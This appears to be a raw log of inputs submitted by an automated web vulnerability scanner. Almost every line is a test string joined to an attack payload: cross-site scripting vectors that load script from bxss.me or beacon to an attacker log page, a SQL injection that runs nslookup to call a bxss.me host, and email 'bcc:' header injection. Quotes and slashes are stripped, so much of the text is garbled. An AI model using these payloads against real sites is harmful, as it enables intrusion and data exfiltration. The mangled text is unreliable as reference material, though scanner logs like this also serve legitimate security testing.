testing
,
xingcode,
testing<script><svgonload= onmouseover=1 (s=document.createElement(script.source) s.src=( bxss.mesu=065841,
testing>><script src=http:bxss.mesu=065841,
testing(),
xing code bypass,
testing< contenteditable onresize=fr6n(9805)>,
testing}body{acu:Expre**SSion(fr6n(9381))},
testing<img<!-- --> src=x onerror=alert(9321);><!-- -->,
testing<input autofocus onfocus=fr6n(9383)>,
testingu003CScRiPtfr6n(9269)u003CsCripTu003E,
testing<imgsrc=> onerror=alert(9263)>,
testingDndib <ScRiPt >fr6n(9860)<ScRiPt>,
testing<W2XSBD>R1DDU[! !]<W2XSBD>,
testing<ifRAme sRc=9024.com><IfRamE>,
testing<Hr8FDW x=9750>,
testing<img sRc=http:attacker-9482log.php,
testing<2gXqU4<,
testing;copy (select ) to program nslookup dns.sqli.065841.143-100176.143.42d1c.1.bxss.me,
testing bcc:065841.143-100177.143.42d1c.1@bxss.me,
testing<img src=xyz OnErRor=fr6n(9966)>,
testing<img src=testasp.vulnweb.comtdot.gif onload=fr6n(9363)>,
testing<body onload=fr6n(9524)>,
xingcode bypass,
testing bcc:065841.143-96947.143.34d85.1@bxss.me